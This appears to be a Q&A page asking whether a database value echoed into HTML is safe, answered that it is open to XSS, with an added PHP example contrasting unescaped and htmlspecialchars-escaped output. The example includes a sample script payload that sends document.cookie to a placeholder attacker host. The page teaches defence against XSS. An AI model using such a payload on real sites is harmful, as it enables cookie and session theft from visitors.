$stat = $con->prepare("SELECT * FROM view WHERE user_name = :user ORDER BY id DESC");
$stat->bindValue(':user', $user);   // bound parameter: $user cannot change the SQL text
$stat->execute();
$row = $stat->fetch(PDO::FETCH_ASSOC);
$model = $row['model'];             // raw column value, exactly as stored in the database

This script works without any problem. Is $model safe or do I need to sanitize it?

Usage:

<span><?php echo $row['model']; ?></span>

Is this safe?

    No, you are open to XSS injections with this code. http://stackoverflow.com/questions/1996122/how-to-prevent-xss-with-html-php Note: this is not a PDO vulnerability, your PDO/SQL is good. – chris85 Aug 27 '15 at 00:28
  • good question for sure – Drew Aug 27 '15 at 00:38
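As an added illustration of the point made in the comments (this is not code from the question, and the database row is constructed inline rather than fetched through PDO): the prepared statement protects the query, but whatever is stored in the `model` column is emitted into the page verbatim, so a value containing markup is parsed by the browser as markup. The hardened version escapes for the HTML element-body context with `htmlspecialchars()`; the hostname `evil.example` in the sample payload is a placeholder.

```php
<?php
// Added example, not part of the original question.
// Shows the unescaped echo from the question beside an escaped version.
declare(strict_types=1);

// Constructed sample row: imagine an attacker managed to store this as their "model".
$row = [
    'model' => '<script>location="https://evil.example/?c="+document.cookie</script>',
];

// Vulnerable rendering, equivalent to <span><?php echo $row['model']; ?></span>.
// The <script> element is emitted as-is and runs in every visitor's browser.
function renderUnsafe(string $model): string
{
    return '<span>' . $model . '</span>';
}

// Hardened rendering: encode <, >, &, " and ' so the browser shows the text
// instead of interpreting it. ENT_SUBSTITUTE replaces invalid UTF-8 rather than
// returning an empty string; the charset must match the page's declared encoding.
function renderSafe(string $model): string
{
    $escaped = htmlspecialchars($model, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<span>' . $escaped . '</span>';
}

// Quick check that the escaped output contains no raw tag delimiters.
function containsRawTags(string $html): bool
{
    // Strip the single <span> wrapper we added, then look for any remaining < or >.
    $inner = substr($html, strlen('<span>'), -strlen('</span>'));
    return str_contains($inner, '<') || str_contains($inner, '>');
}

echo renderUnsafe($row['model']), PHP_EOL;
echo renderSafe($row['model']), PHP_EOL;
var_dump(containsRawTags(renderUnsafe($row['model'])));   // true: payload intact
var_dump(containsRawTags(renderSafe($row['model'])));     // false: payload neutralised
```

Escape at output time, in the context the value lands in: `htmlspecialchars()` is correct for text between tags and for quoted attribute values, but a value placed inside a `<script>` block, an event-handler attribute, or a URL needs a different encoder for that context. Storing pre-escaped data in the database instead is fragile, because the same value is often displayed in more than one context.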

0 Answers